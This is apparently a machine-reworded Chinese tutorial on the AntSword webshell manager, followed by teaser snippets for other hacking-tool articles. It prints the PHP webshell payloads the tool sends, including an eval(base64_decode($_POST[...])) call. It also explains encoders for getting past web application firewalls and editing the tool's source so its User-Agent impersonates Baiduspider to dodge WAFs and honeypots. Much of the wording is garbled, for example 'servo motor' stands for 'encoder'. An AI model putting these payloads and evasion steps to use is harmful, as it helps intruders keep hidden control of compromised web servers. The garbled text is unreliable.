中国蚁剑是一款开源系统的混合开发网址可视化工具,它关键朝向于合理合法受权的网站渗透测试安全性工作人员及其开展基本实际操作的系统管理员。
通俗化的讲:中国蚁剑是 一 款比水果刀还牛的shell操纵端手机软件。
中国蚁剑青睐模块化设计的开发设计观念,遵照开源系统,就需要开得好看的标准,着眼于为不一样层级的群体出示最简单易懂、便捷立即的编码展现以及改动表明,勤奋让大伙儿能够一起为这一新项目奉献出有意义的事的一点一滴,让这个专用工具真实能让大伙儿用得顺意、舒服,让它能为大伙儿使出出最个性化最合适你的工作能力!
唯一官方网github下载链接:https://github.com/AntSwordProject/
留意:我们下载的情况下必须免费下载2个一部分,一个是新项目关键源代码”antSword“,另一个是加载器;加载器则分成三个版本号:Mac、Windows、Linux。
因为我下载的是“AntSword-Loader-v4.0.3-win32-x64.zip”,我也以Windows版本号64位来实例了。
1、大家缓解压力“AntSword-Loader-v4.0.3-win32-x64.zip”后,双击鼠标“AntSword.exe”;
之一次安裝新项目必须先复位,假如你早已安装了关键源代码,就挑选新项目源代码的文件夹名称。(假如只安装了加载器,挑选一个空文件夹名称,加载器会全自动帮你下载关键新项目源代码)。
留意:这一新项目文件夹名称是你之后必须备份数据的,储存着你的shell和shell内的材料。
2、等复位进行后,再双击鼠标“AntSword.exe”就可以一切正常起动!
应用实际上跟水果刀基本上类似,仅仅蚁剑作用更强劲一些,下边就简易给大伙说说:
1、加上一个shell
更先:右键单击 - 加上数据信息;
次之:键入URL详细地址,联接登陆密码及其编号设定。PHP語言强烈推荐在线编辑器应用chr数据加密;
再度:假如必须自身写伺服电机的数据加密种类,能够按下面的图来实际操作:
从次:还能够配备shell的恳求信息内容和post內容;
2、软件
中国蚁剑有一个软件销售市场,能够安裝一些软件,软件有很多。下列是部分软件截屏:
3、有关伺服电机
伺服电机是这一程序流程的独到之处,用伺服电机数据加密能够轻轻松松绕开WAF。
何不,大家来比照一下默认设置不应用编号传送和base64编号传送的差别:
密文传送,post內容为:
[email protected]_set("display_errors", "0");@set_time_limit(0);echo "3e231";$D=dirname($_SERVER["SCRIPT_FILENAME"]);if($D=="")$D=dirname($_SERVER["PATH_TRANSLATED"]);$R="{$D} ";if(substr($D,0,1)!="/"){foreach(range("C","Z")as $L)if(is_dir("{$L}:"))$R.="{$L}:";}else{$R.="/";}$R.=" ";$u=(function_exists("posix_getegid"))[email protected]_getpwuid(@posix_geteuid()):"";$s=($u)?$u["name"]:@get_current_user();$R.=php_uname();$R.=" {$s}";echo $R;;echo "8e51f";die();
base64数据加密,post內容为:
_0x4ee8506e59871=QGluaV9zZXQoImRpc3BsYXlfZXJyb3JzIiwgIjAiKTtAc2V0X3RpbWVfbGltaXQoMCk7ZWNobyAiNzk1ODAiOyREPWRpcm5hbWUoJF9TRVJWRVJbIlNDUklQVF9GSUxFTkFNRSJdKTtpZigkRD09IiIpJEQ9ZGlybmFtZSgkX1NFUlZFUlsiUEFUSF9UUkFOU0xBVEVEIl0pOyRSPSJ7JER9CSI7aWYoc3Vic3RyKCRELDAsMSkhPSIvIil7Zm9yZWFjaChyYW5nZSgiQyIsIloiKWFzICRMKWlmKGlzX2RpcigieyRMfToiKSkkUi49InskTH06Ijt9ZWxzZXskUi49Ii8iO30kUi49IgkiOyR1PShmdW5jdGlvbl9leGlzdHMoInBvc2l4X2dldGVnaWQiKSk/QHBvc2l4X2dldHB3dWlkKEBwb3NpeF9nZXRldWlkKCkpOiIiOyRzPSgkdSk/JHVbIm5hbWUiXTpAZ2V0X2N1cnJlbnRfdXNlcigpOyRSLj1waHBfdW5hbWUoKTskUi49Igl7JHN9IjtlY2hvICRSOztlY2hvICIwOWE3ZSI7ZGllKCk7&[email protected](@base64_decode($_POST[_0x4ee8506e59871]));
留意:在其中,ant主要参数名字是shell登陆密码。
再讨论一下chr编号传送,彻底就所有编号了。
4、user-agent改动
要留意的是,手机软件默认设置的user-agent是:User-Agent: antSword/v2.0;并且绝大多数人都不容易去自定useragent,这就给waf和蜜獾白白的送了一个特点,因此我们要改动一下源码:
改动新项目相对路径:
antSword\modules\request.js (改动const USER_AGENT = 'antSword/v2.1'; 这一行编码!)
antSword\modules\update.js (有多处要改动;可检索“antSword/v2.0”来寻找这二行编码!)
我这里是把antSword/v2.0或antSword/v2.1改动以便Baiduspider-image,我改为了百度图片搜索引擎蜘蛛;
假如大伙儿有没有什么不明白的,请查询汉语使用说明:https://doc.u0u.us/zh-hans/
什么叫Truecrypt? TrueCrypt在2017年五月淘汰以前是一款出色的开源系统磁盘加密系统软件。客户能够 根据键入客户建立的登陆密码语句来对其全部系统文件开展数据加密。它还具备容许客户掩...
什么叫Cain和Abel黑客工具? Cain和Abel是用以密码恢复的最火爆的专用工具之一。它能够 根据应用例如暴力行为进攻,登陆密码分析攻击和最常见的词典进攻这类的方式 来修复各种各样登陆密码。这...
什么叫Nmap? Nmap是IT观念上的“互联网映射器” - “互联网”的简称。您能够 将Nmap视作最知名的一个,事实上是最有效的黑客工具之一。期。假如您认真完成规化图,伦理道德网络黑客和IT安全...
怎么学习黑客技术 1、参与CTF比赛 CTF比赛是黑客学习和提高技能的重要途径,初学者可以参加一些入门级别的CTF比赛,挑战自己的技能,并从比赛中学习经验和技巧。2、必须保持学徒的心:一个真正的大师永...
Nmap坚信大伙儿也不生疏了,今日刻意梳理成浅显易懂的Nmap的作用和使用方法,有必须的盆友请个人收藏,或是储存到自身的手机上和电脑都能够。 一、Nmap的英语的语法 nmap [sc...
介绍: tcpdump全名:dump the traffic on a network,依据使用人的界定对互联网上的数据文件开展捕获的包分析工具。 tcpdump能够将互联网中传输的数据文件的“头”...